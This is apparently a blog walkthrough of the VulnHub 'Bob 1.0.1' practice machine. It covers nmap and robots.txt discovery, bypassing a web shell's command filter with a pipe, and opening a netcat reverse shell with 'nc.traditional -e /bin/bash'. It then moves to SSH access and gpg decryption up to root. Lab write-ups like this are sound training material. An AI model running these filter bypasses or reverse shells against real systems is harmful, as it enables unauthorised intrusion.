Bob 1.0.1 – Hacking Challenge Walkthrough

Bob 1.0.1 – Hacking Challenge Walkthrough

The BOB 1.0.1 machine is available on VulnHub. It is intended for beginners/intermediates. Getting the initial shell was very easy although you may have to spend several hours finding the root. I would use Parrot Sec OS but you can use Kali Linux or any other Linux distro that you want. Open your terminal and activate the VM. Use netdiscover to find the IP address of the machine.

Hacking Challenge

Bob’s ip is “”. So I’m gonna register this ip to my DNS file (/etc/hosts) with the name of “bob.local”. Use the command

sudo nano /etc/hosts         Enter a new line at the beginning    bob.local                Now you don’t have to remember the IP address of the machine, instead you can just type “bob.local”. Its just easier to remember. Now run a full port nmap scan.

We discovered SSH and HTTP open ports open as well as some interesting entries in the “robots.txt” file. Also going to bob.local provides the below web page:

We discovered SSH and HTTP open ports

Nothing in Source Code (to see source code of a webpage, press CRTL+U). So opening robots.txt file to see disallowed entries
bob.local robots.txt

“/lat_memo.html” and “/passwords.html” contains Memos from bob regarding a Security Breach.


But “/dev_shell” looks interesting.



Entering different commands like “ls”, gives the following output



Commands like “whoami”, “id” and “echo” are successfully executed giving us following output. However the php code behind this filters out commands by name, it has filtered out common commands like “nc” and “ls”.


Now we try semi-colon “;” to separate commands. We Enter “echo 1234; ls” interestingly when the first command ends with semi-colon, it then automatically executes the second command (ls)


Wait, what? it has filtered out semi-colon too, showing us some mocking output. But we can still execute our second command using the PIPE (|) operator instead of semi-colon.

dev shell

shell dev

and here we got our second command executed. As you can see that nc.traditional package is installed and we can successfully get a reverse shell using netcat. Just start a netcat listener in your terminal

sudo nc -nlvp 1234

Then utilise the the following reverse shell ( is the attacker’s ip address)

echo 1234 | nc.traditional -nv 1234 -e /bin/bash

nc -nvlp 1234


Hoorraayy !! we got our first shell, but we still need to do some enumeration to get root. After some reseach I found out that ”/home” contains four users “bob”, “elliot”, “jc” and “seb”. In “/home/elliot” directory, I found a file “theadminisdumb.txt”


After reading this text. SSH to port 25468 and login with user “elliot” and the password “theadminisdumb”. Use the following syntax:

ssh elliot@bob.local -p 25468

ssh elliot@bob.local -p 25468


and here we got our ssh shell, which is of course better than a reverse shell. Now, after some research in “home/bob”, I found some interesting files in the “Documents” directory. It contains an encrypted “login.txt.gpg” file and “staff.txt” After reading staff.txt, I found nothing useful.

“/home/bob/Documents/Secret/Keep_Out/Not_Porn/No_Lookie_In_Here” has a file “”. Apparently, its not useful until you see that if you join the first letter of each line then it becomes “HARPOCRATES”. This could be the password for the encrypted gpg file.



Now decrypt this gpg file using that cryptic password we obtained in the screen above. Enter the following command and you’ll be prompted for a passw0rd.



And we finally got the password for bob. Now ssh to bob using “b0bcat_” as password.



Now as you can see, we have rooted the machine.